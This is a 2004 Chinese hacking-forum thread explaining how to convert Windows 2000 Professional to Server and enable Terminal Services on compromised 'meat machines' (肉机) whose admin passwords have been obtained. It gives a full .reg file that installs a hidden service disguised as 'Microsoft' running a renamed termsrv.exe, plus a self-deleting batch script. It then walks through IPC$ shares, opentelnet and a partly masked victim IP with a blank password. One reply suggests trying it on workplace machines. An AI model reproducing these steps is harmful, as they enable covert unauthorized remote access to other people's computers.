论坛: 黑客进阶 标题: 在win专业版下开3389! 复制本贴地址    
作者: lijingxi [lijingxi]    见习版主   登录
在win专业版下开3389!
本帖转至榕哥论坛,是不是原创不清楚
在win2000 Professional版中安装3389终端服务
众所周知windows2000 profassional并不支持3389终端服务,所以我们如果发现得到管理员密码的肉机是此版本,只能放弃安装终端服务的念头。但是现在我们已经可以在profassional版中安装终端服务了!
方法如下:
1. 将profassional版改变为server版
2. 安装终端服务

关于安装终端服务的细节网络中已经有许多优秀的文章,这里不再重复。

下边就说说如何将profassional版改变为server版:

原理:其实windows 2000的各个版本都使用了同样的程序、动态链接库,它们之间最大的差别是在注册表中。windows2000三合一光盘就证明了这一点。因此只要将profassional版注册表中的相关项目改为server及以上版本,就可以在profassional版中安装终端服务了。

现在3am Laboratories已经将改变win2000版本的方法做成一个非常方便使用的软件:NTSwitch,让我们可以随心所欲地快速改变版本。此软件可以在小凤居中下载到,下载地址为URL http://www.chinesehack.org/down/show.asp?id=2192&down=1

可能由于微软的压力,3am Laboratories已将此软件从其主页中删除,大家快下载吧!


远程版本变换的具体实现方法:

法1:
1 在远程肉机上运行支持图形界面的远程控制程序(如:冰河、PcAnyWhere等)
2 远程控制下,下载并运行NTSwitch改变版本
3 安装3389终端服务

此法非常方便,技术要求最低。但操作过程对方是全部可以看见的,非常危险!

法2:
1 自己将自己本地的win2000 professional改变为win2000 server版,利用注册表对比软件对比版本变换前后注册表的差别。将差别制作成一个chang.reg文件。
2 利用所得到的肉机管理员密码,开启肉机Telnet服务。
3 Telnet上肉机后,利用regedit.exe /s chang.reg 命令, 将远程注册表改变,从而实现远程win2000的版本变换。

此法需要一定的经验,但操作很安全。而且可以用“迷途vb”的方法进一步安装3389终端服务。


以下是“迷途vb”的安装3389终端服务方法

========================
首先我们制作开启3389的工具
先把下面的注册表内容copy一份,另存为3389.reg注册表文件
注册表内容:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionnetcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD]
"Start"=dword:00000002
[HKEY_USERS.DEFAULTKeyboard LayoutToggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"
再把下面的内容保存为批处理文件3389.bat
安装批处理内容:
copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat
用winrar制作成exe自解压缩包

61.188.***.*** user:administrato pass:空
先使用工具letmein判断其操作系统
letmein \ip -all -d
TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了
再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾
应该没有开启了
建立ipc连接
copy工具过去
net use \ipipc$ "pass" /user:name
copy file \ipadmin$system32
用opentelnet开对方的telnet
opentelnet \ip name pass 1 99
用telnet进入
进入到对方的winntsystem32
目录
解压缩3389.exe
运行安装批处理3389.bat
现在我们把对方重起一下,用reboot
我们用ping命令监视他的上线情况,等他下线,呵呵下了,又上来了,不慌连,3389等会才能好,对方的机器有点慢
看见了么,开启成功! 







――――――――――――――――――――――――――――――――――――――――――
以上方法谁用过  是否成功! 请麻烦告知  QQ607182


地主 发表时间: 04-06-18 20:32

回复: dtip [dtip]   论坛用户   登录
请问      你上面copy过去的是什么工具啊?!

    还有      请问    XP  可以直接安装终端服务吗?!

  我工作用的机器是 XP 的 我想  用3389管理  如何实现啊?!

B1层 发表时间: 04-06-18 23:34

回复: www [wish259]   论坛用户   登录
哈哈我刚好也看到这篇文章,帮你顶一下

B2层 发表时间: 04-06-18 23:41

回复: pady [pady]   论坛用户   登录
很好啊,顶!94不知好用不?

B3层 发表时间: 04-06-19 09:58

回复: lijingxi [lijingxi]   见习版主   登录
大哥们  我是问问谁用过  好用不好用! 告诉我一下!

B4层 发表时间: 04-06-20 20:10

回复: www [wish259]   论坛用户   登录
没搞过在你上班的地方找机器搞吧

B5层 发表时间: 04-06-21 22:31

回复: snowred [snowred]   论坛用户   登录
我试了
怎么感觉不怎么好用呀……

B6层 发表时间: 04-06-23 19:24

回复: dupi [dupi]   论坛用户   登录
XP自带了3389服务.在我的电脑属性-远程 先中

B7层 发表时间: 04-06-24 13:15

回复: lijingxi [lijingxi]   见习版主   登录
请问楼上的实验成功了么?

B8层 发表时间: 04-06-24 14:03

回复: BrideX [bridex]   论坛用户   登录
WIN98也可以装3389
你信不?

B9层 发表时间: 04-06-24 14:16

回复: haifeng10 [haifeng10]   论坛用户   登录
98也安装3389?

B10层 发表时间: 04-06-24 17:02

回复: shengli [shengli]   论坛用户   登录
不是把98也能?

B11层 发表时间: 04-07-16 07:58

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号